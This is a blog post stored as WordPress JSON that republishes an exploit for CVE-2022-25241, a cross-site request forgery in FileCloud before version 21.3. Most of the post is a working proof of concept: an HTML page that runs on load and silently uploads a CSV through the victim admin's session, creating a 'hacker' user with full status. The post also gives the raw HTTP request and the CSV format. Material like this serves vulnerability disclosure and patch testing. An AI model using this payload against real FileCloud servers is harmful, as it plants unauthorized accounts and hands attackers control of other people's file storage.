{"id":20922,"date":"2022-02-22T09:31:44","date_gmt":"2022-02-22T06:31:44","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166074\/filecloud212-xsrf.txt"},"modified":"2022-02-22T10:11:49","modified_gmt":"2022-02-22T06:41:49","slug":"filecloud-21-2-cross-site-request-forgery","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/filecloud-21-2-cross-site-request-forgery\/","title":{"rendered":"FileCloud 21.2 Cross Site Request Forgery"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: FileCloud 21.2 &#8211; Cross-Site Request Forgery (CSRF)<br \/>\n# Date: 2022-02-20<br \/>\n# Exploit Author: Masashi Fujiwara<br \/>\n# Vendor Homepage: https:\/\/www.filecloud.com\/<br \/>\n# Software Link: https:\/\/hub.docker.com\/r\/filecloud\/filecloudserver21.2<br \/>\n# Version: All versions of FileCloud prior to 21.3 (Fixed: version 21.3.0.18447)<br \/>\n# Tested on:<br \/>\n# OS: Ubuntu 18.04.6 LTS (Docker)<br \/>\n# Apache: 2.4.52<br \/>\n# FileCloud: 21.2.4.17315<br \/>\n# CVE: CVE-2022-25241 (https:\/\/www.filecloud.com\/supportdocs\/fcdoc\/latest\/server\/security-advisories\/advisory-2022-01-3-threat-of-csrf-via-user-creation)<\/p>\n<p dir=\"ltr\"># Conditions<br \/>\n1. Only vulnerable if cookies have samesite set to None (SameSite=None).<br \/>\necho &#039;define(&quot;TONIDOCLOUD_COOKIE_SAME_SITE_TYPE&quot;, &quot;None&quot;);&#039; &gt;&gt; \/var\/www\/html\/config\/cloudconfig.php<br \/>\n2. 
Use https as the target URL (when cookies set SameSite=None, they must also set Secure).<\/p>\n<p dir=\"ltr\"># PoC (HTML)<br \/>\n&lt;html&gt;<br \/>\n&lt;head&gt;<br \/>\n&lt;meta http-equiv=&quot;Pragma&quot; content=&quot;no-cache&quot;&gt;<br \/>\n&lt;meta http-equiv=&quot;Cache-Control&quot; content=&quot;no-cache&quot;&gt;<\/p>\n<p dir=\"ltr\">&lt;script&gt;<br \/>\nfunction init(){<br \/>\nmyFormData = new FormData();<br \/>\nlet fileContent = new Blob([&quot;UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified\\nhacker,hacker@hacker.com,Password1,hacker,FULL,02\/26\/2222,Group1,YES\\n&quot;], {type: &#039;application\/vnd.ms-excel&#039;});<br \/>\nmyFormData.append(&quot;uploadFormElement&quot;, fileContent, &quot;user.csv&quot;);<br \/>\nfetch(&quot;https:\/\/192.168.159.129:8443\/admin\/?op=import&amp;sendapprovalemail=0&amp;sendpwdasplaintext=0&quot;, { method: &quot;post&quot;, body: myFormData, credentials: &quot;include&quot;});<br \/>\n}<br \/>\n&lt;\/script&gt;<br \/>\n&lt;\/head&gt;<br \/>\n&lt;body onload=&quot;init()&quot;&gt;<br \/>\nCSRF PoC for CVE-2022-25241<\/p>\n<p dir=\"ltr\">Create hacker user with Password1 via CSV file upload.<br \/>\n&lt;\/body&gt;<br \/>\n&lt;\/html&gt;<\/p>\n<p dir=\"ltr\"># HTTPS Request<br \/>\nPOST \/admin\/?op=import&amp;sendapprovalemail=0&amp;sendpwdasplaintext=0 HTTP\/1.1<br \/>\nHost: 192.168.159.129:8443<br \/>\nCookie: X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin; tonidocloud-as=29352577-cfaa-42e6-80e5-7a304bc78333; tonidocloud-ah=4514fb08f852d2682151efdb938d377734b1e493<br \/>\nContent-Length: 365<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/98.0.4758.102 Safari\/537.36<br \/>\nContent-Type: multipart\/form-data; boundary=----WebKitFormBoundaryiAXsUsJ2ZV54DFuW<br \/>\nConnection: close<\/p>\n<p 
dir=\"ltr\">------WebKitFormBoundaryiAXsUsJ2ZV54DFuW<br \/>\nContent-Disposition: form-data; name=&quot;uploadFormElement&quot;; filename=&quot;user.csv&quot;<br \/>\nContent-Type: application\/vnd.ms-excel<\/p>\n<p dir=\"ltr\">UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified<br \/>\nhacker,hacker@hacker.com,Password1,hacker,FULL,02\/26\/2222,Group1,YES<\/p>\n<p dir=\"ltr\">------WebKitFormBoundaryiAXsUsJ2ZV54DFuW--<\/p>\n<p dir=\"ltr\"># CSV file format<br \/>\nUserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified<br \/>\nhacker,hacker@hacker.com,Password1,hacker,FULL,02\/26\/2222,Group1,YES<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: FileCloud 21.2 &#8211; Cross-Site Request Forgery (CSRF) # Date: 2022-02-20 # Exploit Author: Masashi Fujiwara # Vendor Homepage: https:\/\/www.filecloud.com\/ # Software Link: https:\/\/hub.docker.com\/r\/filecloud\/filecloudserver21.2 # Version: All versions of FileCloud prior to 21.3 (Fixed: version 21.3.0.18447) # Tested on: # OS: Ubuntu 18.04.6 LTS (Docker) # Apache: 2.4.52 # FileCloud: 21.2.4.17315 # CVE: 
&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-20922","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/20922","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=20922"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/20922\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=20922"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=20922"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=20922"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}